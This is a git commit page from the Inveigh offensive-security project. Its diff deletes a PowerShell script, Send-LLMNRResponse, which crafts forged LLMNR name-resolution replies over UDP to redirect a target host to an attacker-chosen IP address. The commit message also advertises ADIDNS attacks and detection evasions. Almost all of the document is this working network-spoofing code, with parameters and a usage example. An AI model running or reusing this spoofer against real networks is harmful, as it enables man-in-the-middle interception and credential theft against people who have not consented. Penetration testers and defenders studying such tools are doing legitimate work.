Inveigh 1.41.4

Inveigh Added ADIDNS attacks New detection evasions Inveigh Relay Added session and enumerate attacks Added ability to handle multiple targets with target selection based on the enumerate attack and/or BloodHound imports
author: Kevin Robertson <robertsonk@gmail.com> 2018-09-25 14:46:02 -0400
committer: Kevin Robertson <robertsonk@gmail.com> 2018-09-25 14:46:02 -0400
commit: c9809376e0afb613b3331a79c8ac83c7f48c679a (patch)
tree: a7b7a36114fb51ea28c4201d838f896aa10427ab /Extras/Send-LLMNRResponse.ps1
parent: a2553ac147ceddb23bb85f3e37f9b82c626b6e38 (diff)
download: Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.tar.gz
Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.zip
1 files changed, 0 insertions, 87 deletions
diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1
deleted file mode 100644
index cc22091..0000000
--- a/Extras/Send-LLMNRResponse.ps1
+++ /dev/null
@@ -1,87 +0,0 @@
-
-function Send-LLMNRResponse
-{
-<#
-.SYNOPSIS
-Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request.
-You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the
-target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response
-window. Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER LLMNRTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355
-which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine.
-
-.PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host. 
-
-.PARAMETER TargetIP
-Specify an IP address to target for the LLMNR response.
-
-.PARAMETER TargetPort
-Specify an port to target for the LLMNR response. This port must match the source port included in the request.
-
-.EXAMPLE
-Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$true)][Int]$TargetPort="",
-[parameter(Mandatory=$false)][Int]$SendPort="0",
-[parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
-    throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{ 
-    $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
-[Array]::Reverse($LLMNR_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-$LLMNR_response_packet = $Transaction_ID_bytes +
-                                 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
-                                 $hostname_bytes.Count +
-                                 $hostname_bytes +
-                                 0x00,0x00,0x01,0x00,0x01 +
-                                 $hostname_bytes.Count +
-                                 $hostname_bytes +
-                                 0x00,0x00,0x01,0x00,0x01 +
-                                 $LLMNR_TTL_bytes +
-                                 0x00,0x04 +
-                                 ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort)
-$send_socket.Connect($destination_point)
-$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
-$send_socket.Close()
-}
-\ No newline at end of file
author	Kevin Robertson <robertsonk@gmail.com>	2018-09-25 14:46:02 -0400
committer	Kevin Robertson <robertsonk@gmail.com>	2018-09-25 14:46:02 -0400
commit	c9809376e0afb613b3331a79c8ac83c7f48c679a (patch)
tree	a7b7a36114fb51ea28c4201d838f896aa10427ab /Extras/Send-LLMNRResponse.ps1
parent	a2553ac147ceddb23bb85f3e37f9b82c626b6e38 (diff)
download	Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.tar.gz Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.zip